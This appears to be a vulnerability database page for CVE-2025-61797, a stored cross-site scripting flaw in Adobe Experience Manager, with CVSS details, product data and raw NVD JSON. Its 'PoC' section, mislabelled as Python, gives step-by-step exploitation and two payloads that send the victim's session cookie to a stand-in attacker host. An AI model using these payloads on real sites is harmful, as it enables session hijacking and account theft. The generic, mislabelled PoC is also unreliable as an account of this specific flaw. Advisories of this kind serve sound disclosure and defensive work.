Security Vulnerability Report
中文
CVE-2025-61797 CVSS 5.4 MEDIUM

CVE-2025-61797

Published: 2025-10-14 22:15:39
Last Modified: 2025-11-19 15:29:21

Description

Adobe Experience Manager versions 11.6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Exploitation of this issue requires user interaction in that a victim must open a malicious link. Scope is changed.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:6.5.22.0:fp11.6:*:*:-:*:*:* - VULNERABLE
Adobe Experience Manager <= 11.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-61797: Adobe Experience Manager Stored XSS PoC --> <!-- This PoC demonstrates a stored XSS attack via vulnerable form fields in AEM 11.6 and earlier --> <!-- Step 1: Attacker logs in with low-privilege account --> <!-- Step 2: Attacker navigates to a vulnerable form field (e.g., a text input, rich text editor, or comment field) --> <!-- Step 3: Attacker injects the following malicious payload into the form field: --> <script> // Steal session cookie and exfiltrate to attacker-controlled server var cookie = document.cookie; var img = new Image(); img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie); // Alternatively, perform actions on behalf of the victim // fetch('/api/some-action', { method: 'POST', body: 'malicious=data' }); </script> <!-- Alternative payload using event handlers (may bypass some filters): --> <img src=x onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)"> <!-- Step 4: The malicious script is stored in AEM's backend --> <!-- Step 5: Attacker crafts a malicious link and sends it to the victim: --> <!-- https://victim-aem-instance.com/content/vulnerable-page.html --> <!-- Step 6: When victim visits the page, the stored script executes in their browser context --> <!-- Mitigation in code: Always sanitize user input using HTML encoding --> <!-- Example fix (server-side): --> <!-- StringEscapeUtils.escapeHtml4(userInput) for Java-based AEM components -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61797", "sourceIdentifier": "[email protected]", "published": "2025-10-14T22:15:38.513", "lastModified": "2025-11-19T15:29:21.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 11.6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Exploitation of this issue requires user interaction in that a victim must open a malicious link. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5.22.0:fp11.6:*:*:-:*:*:*", "matchCriteriaId": "62001BCF-609E-4A57-B6F2-6B28B3E34055"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb25-98.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}